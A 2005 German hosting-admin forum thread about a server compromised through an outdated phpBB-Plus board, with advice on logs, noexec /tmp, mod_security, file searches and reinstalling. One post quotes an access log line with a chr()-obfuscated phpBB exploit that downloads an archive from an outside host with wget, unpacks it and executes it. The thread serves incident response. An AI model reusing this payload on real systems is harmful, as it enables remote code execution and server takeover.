Page 1 of 1
Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:08
by bierteufel
Hallo Leute,
ich bin bald am Ende mit meinem Latein.
Folgender Sachverhalt, der (böse) Surfer erlangt wahrscheinlich via PHP Introducion oder MySQL Introducion Schreibrechte auf /tmp/,
dann legt er darin sein scheiss script ab und startet so um dis 200 SSH Scans. Ich habe alle Logfiles durchgesehen, kann Ihn doch jedoch nicht lokalisieren über welchen Kunden Acount er drauf kommt.
System: Suse 9.0, PHP 4.3.10, Confixx 3.07
Solche niedlichen Sachen hat er auch immer noch dabei:
/tmp/.access.log/y2kupdate >/dev/null 2>&1
jetzt gerade
pscan2
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:13
by captaincrunch
Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?
Fragen über Fragen...
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:15
by bierteufel
CaptainCrunch wrote:Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?
Fragen über Fragen...
- Die Prozesses "des freundes" laufen als WWWRUN
- Daten sind gesichert
- Logs sind gesichert
- ich bekomm ihn manuell nur von der Kiste
- es muss doch möglich sein Ihn zu lokalisieren...
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:17
by captaincrunch
ich bekomm ihn manuell nur von der Kiste
Ja, und zwar, nachdem die Kiste neu aufgesetzt ist, und du das oder die unsichere(n) Script(e) lokalisiert und ausgemerzt hast.
es muss doch möglich sein Ihn zu lokalisieren...
Klar, spätestens in den Logs deines Webservers sollten sich massig Anhaltspunkte finden...so lange derjenige nicht schlau genug war, diese Spuren wenigstens ansatzweise zu verwischen (was ich aber nicht annehme).
Zurück zum noexec auf /tmp: warum ist das immer noch nciht passiert?
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:20
by bierteufel
noexec auf /tmp werdsch gleich machen.
Ich bin schon beim durchforsetn von scripten und logs, ich kann den Zeitraum mittlerweile auf fast 10 Minuten eingrenzen und bekomm ihn nicht gefasst.
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:32
by bierteufel
Code: Select all
phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(98)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(103)%252echr(111)%252echr(46)%252echr(114)%252echr(111)%252echr(47)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(116)%252echr(97)%252echr(114)%252echr(32)%252echr(120)%252echr(122)%252echr(118)%252echr(102)%252echr(32)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(46)%252echr(107)%252echr(59)%252echr(46)%252echr(47)%252echr(98)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 23055 "-" "Mozilla/3.0 (compatible; Indy Library)"
was haltet Ihr hier davon ?
Würde auf's phpbb2 Board ja deuten....
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:36
by captaincrunch
Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 07:45
by bierteufel
CaptainCrunch wrote:Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?
PHPBB PLUs 1.5X denke ich,
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 10:18
by Joe User
Bierteufel wrote:PHPBB PLUs 1.5X denke ich,
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...
Das phpBB-Plus beziehungsweise die enthaltenen Mods enthalten mehrere bekannte Sicherheitslücken, wobei der von Dir gepostete Logeintrag zeigt, dass das von Deinem Kunden verwendete phpBB-Plus seit mindestens Dezember 2004 (Stichwort: Santy) nicht upgedatet wurde...
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 14:33
by killerhorse
Hallo,
In diesem Zusammenhang:
http://www.rootforum.org/forum/viewtopic.php?t=35865
Das hilft (meistens)
Ich verwende übrigens die in dem oben genannten Thread nicht uneingeschränkt empfehlenswerten Rules von gotroot:
http://www.gotroot.com/tiki-index.php?p ... ownloa%20d
Funktionieren bei mir bisher 100% zuverlässig. Nachteil: Da für jedes Programm und für jede bekannte Sicherheitslücke versucht wird eine Regel zu erstellen, sind es extrem viele Rules.
Vorteil: bisher wurde noch keine erwünschte funktion von mod_security verhindert, was bei kleiner gehaltenen Rulesets durchaus vorkommen kann.
MfG
Christian
PS: Natürlich sollte man trotzdem bekannte Sicherheitlöcher stopfen und sich nicht zusehr auf mod_security verlassen, aber es bietet doch einen guten Schutz wenn man mal was übersieht.
Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Siehe:
http://www.debian.org/doc/manuals/secur ... h4.de.html Abschnitt 4.9.1
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 14:41
by captaincrunch
Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 14:49
by killerhorse
CaptainCrunch wrote:
Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.
Oh, wusste ich nicht, danke für den Tipp.
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 14:53
by captaincrunch
Die genaue Version müsstest du mal raussuchen, hatte ich hier irgendwann mal gepostet, aber auf die Schnelle nicht wiedergefunden.
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 18:23
by lord_pinhead
Beende den Apache und kopiere mal die find Binary nochmal von einer sauberen Kiste hoch. Mit find / -ctime <tage> und find / -atime <tage> kannst du dann jede File die in den letzten Tagen erstellt wurde finden. Schau ebenfalls mal in die passwd ob ein user angelegt wurde oder der www-data user einen Loginshell bekommen hat und in einer anderen Gruppe mit drinhängt. find / -user www-data ist dann recht nützlich wenn du alle files finden willst du mit dem XSS angelegt wurden (und auch deine normalen files). Ausserdem währe vielleicht noch ein lsattrib /bin | grep "ia" ne Idee Wert, solltest überall anwenden wo deine Programme liegen (/sbin /usr/(s)bin/ usw.) .
Btw.: Wenn du lustig bist, entwirrst du mal den Shellcode, vielleicht kommst du dahinter was gemacht wurde.
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-01 18:29
by outofbound
Oder einfacher:
a) Rechner runterfahren
b) Neu initialisieren lassen
c) Geprüftes Backup einspielen
d) Lücken beseitigen
e) Wieder online gehen.
Gruss,
Out
Re: Bekomm den Angreifer nicht in Griff
Posted: 2005-09-02 06:32
by captaincrunch